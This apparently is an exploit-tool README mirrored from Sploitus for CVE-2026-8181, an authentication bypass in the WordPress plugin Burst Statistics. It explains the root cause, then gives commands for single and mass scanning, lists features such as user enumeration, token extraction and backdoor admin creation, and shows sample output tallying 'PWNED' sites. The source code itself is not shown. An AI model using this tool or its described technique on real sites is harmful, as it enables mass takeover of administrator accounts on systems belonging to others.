Share
## https://sploitus.com/exploit?id=300A3F87-96E3-5A9A-BC5B-46F2890EF41B
# CVE-2026-8181
Burst Statistics | Authentication Bypass to Admin Account Takeover

### Description :

Burst Statistics 3.4.0 - 3.4.1.1 - Authentication Bypass to Admin Account Takeover

The Burst Statistics โ€“ Privacy-Friendly WordPress Analytics (Google Analytics Alternative) plugin for WordPress is vulnerable to Authentication Bypass in versions 3.4.0 to 3.4.1.1. This is due to incorrect return-value handling in the `is_mainwp_authenticated()` function when validating application passwords from the Authorization header. The function calls `wp_authenticate_application_password(null, $username, $password)` which returns `null` (not `WP_Error`) when the target user has no Application Passwords configured. Since the code only checks `is_wp_error()`, it proceeds to call `wp_set_current_user()` โ€” granting full admin privileges to the attacker for the entire request.

The bypass is triggered during `plugins_loaded` (priority 9) via `has_admin_access()` in the plugin's bootstrap, meaning the user impersonation happens **before** WordPress REST API dispatches any route โ€” allowing access to all WP Core endpoints (`/wp/v2/users`, `/wp/v2/users/me`, etc.) as administrator.

This makes it possible for unauthenticated attackers, with knowledge of an administrator username, to impersonate that administrator by supplying any random Basic Authentication password, achieving full privilege escalation and admin account takeover.


# INFO : [**CVE-2026-8181**](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/burst-statistics/burst-statistics-340-3411-authentication-bypass-to-admin-account-takeover)

~ **CVSS Score: 9.8 (Critical)**

~ **CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H**

~ **Affected Versions: 3.4.0 - 3.4.1.1**

~ **Patched Version: 3.4.2**

- Researcher : [**Chloe Chamberland - Wordfence**](https://www.wordfence.com/threat-intel/vulnerabilities/researchers/chloe-chamberland)



### Usage :

**Single target :**
- `python3 shadow.py -u https://target.com`

**Single target with known username :**
- `python3 shadow.py -u https://target.com -U admin`

**Mass targets :**
- `python3 shadow.py -f targets.txt -t 20`

**Interactive mode :**
- `python3 shadow.py`
- input target file name
- input thread 1-50 max
- input timeout 5-30s

### Features :

- Multi-threading (mass scan up to 50 threads)
- Authentication Bypass via X-BURSTMAINWP header + Basic Auth
- Auto WordPress Detection
- Burst Statistics Version Detection & Vulnerable Version Check
- Route Alive Check (`/burst/v1/mainwp-auth`)
- User Enumeration (REST API + Author Archive + oEmbed fallback)
- Application Password Token Extraction
- Admin User Creation via WP REST API
- Admin Password Reset (fallback)
- Takeover Verification via wp-login.php
- Auto HTTP/HTTPS Fallback & Retry
- Triple Output (user.txt, token.txt, new-user-and-header.txt)

### Output :

```bash

โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
โ•‘  ๐Ÿ”ฅ CVE-2026-8181 Burst Statistics Auth Bypass       โ•‘
โ•‘  ๐Ÿ‘ฉโ€๐Ÿ’ป Friska & Shadow | Route Check | Full Fallback  โ•‘
โ•‘  ๐ŸŽฏ 3.4.0-3.4.1.1 | CVSS 9.8 | Triple Output        โ•‘
โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

[*] [HTTP] http://target.com
[+] Burst Statistics version: 3.4.0
[+] Burst mainwp-auth route alive!
[*] Testing 2 user(s): admin, editor
[*] Trying bypass on: admin (id=1)
[+] BYPASS SUCCESS โ†’ admin (id=1, admin=True)
[+] Application Password token extracted!
[๐Ÿ’€] USER CREATED: shadow / R4nd0mP@ss!
[๐Ÿ’€] TAKEOVER VERIFIED via wp-login.php!
[๐Ÿ’€] SUCCESS! http://target.com/wp-admin/

```

```bash

โšก MASS SCAN: 50 targets | 20 threads
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€
[๐Ÿ’€] [1/50] http://target1.com โ†’ PWNED!
[๐Ÿ’€] [2/50] http://target2.com โ†’ PWNED!
[โ˜ ๏ธ] [3/50] http://target3.com โ†’ DEAD
[-] [4/50] http://target4.com โ†’ SECURED
[!] [5/50] http://target5.com โ†’ PATCHED
โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€

โ•”โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•—
โ•‘       ๐Ÿ“Š SCAN SUMMARY            โ•‘
โ• โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฃ
โ•‘ ๐Ÿ’€ PWNED: 12                     โ•‘
โ•‘ โ˜ ๏ธ  DEAD: 8                      โ•‘
โ•‘ ๐Ÿ”’ SECURED: 5                    โ•‘
โ•‘ โš ๏ธ  PATCHED: 15                  โ•‘
โ•‘ โŒ FAILED: 10                    โ•‘
โ• โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฃ
โ•‘ Total: 50                        โ•‘
โ•šโ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•

[+] ๐Ÿ“ user.txt | token.txt | new-user-and-header.txt

```

## Disclaimer :

## This tool is for educational and security testing purposes only.
Unauthorized use of systems you don't own or don't have permission to test is illegal.